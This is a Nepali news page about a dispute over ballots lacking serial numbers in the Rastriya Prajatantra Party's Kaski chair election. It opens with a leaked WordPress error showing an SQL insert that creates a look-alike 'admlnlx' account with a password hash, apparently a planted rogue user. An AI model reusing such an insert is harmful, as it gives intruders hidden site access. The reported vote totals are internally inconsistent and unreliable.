WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgIWJgFJ1ur8W9kvKX3mT4U7KXt26e0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:40:24', '', 'admlnlx', 'admlnlx')
पोखरा, माघ २९-
राष्ट्रिय प्रजातन्त्र पार्टी कास्कीको निर्वाचनमा मतपत्रमा क्रमसंख्या नभएको भन्दै हंगामा भएको छ । राष्ट्रिय प्रजातन्त्र पार्टी कास्कीको अध्यक्ष पदका उमेद्वार जयलाल पुन र नारायण गुरुङ बिच भएको प्रतिस्र्धामा केहि मतपत्रमा क्रमसंख्या नभएको भेटिए पछि हंगामा भएको हो ।
केही मतपत्रमा क्रमसंख्या नहाने भेटिए पछि कम मत ल्याउने पक्षले बिरोध गरेको हो । बिरोध र नाराबाजी पछि निर्वाचन कमिटिले केन्द्रिय निर्वाचन कमिटिलाई मतपत्र पठाएको छ । १ सय ६९ मतमा १ सय ६२ खसेको र जयलाल पुन पक्षमा ८६ र नारायण गुरुङ पक्षमा ७९ मत गणना भएको राप्रपाका कार्यक्रताहरुले बताएका छन् ।
त्यसै गरि ६ मत बदर भएको उनीहरुले बताए । बिहीबार भएको निर्वाचनमा गणता राती नै भए पनि पुन गणना भएको थियो । त्यसै गरि २६ सदस्यका लागि ४३ जनाले उमेद्वारी दिएका थिए । सदस्यहरुको गणना सकिएको छ ।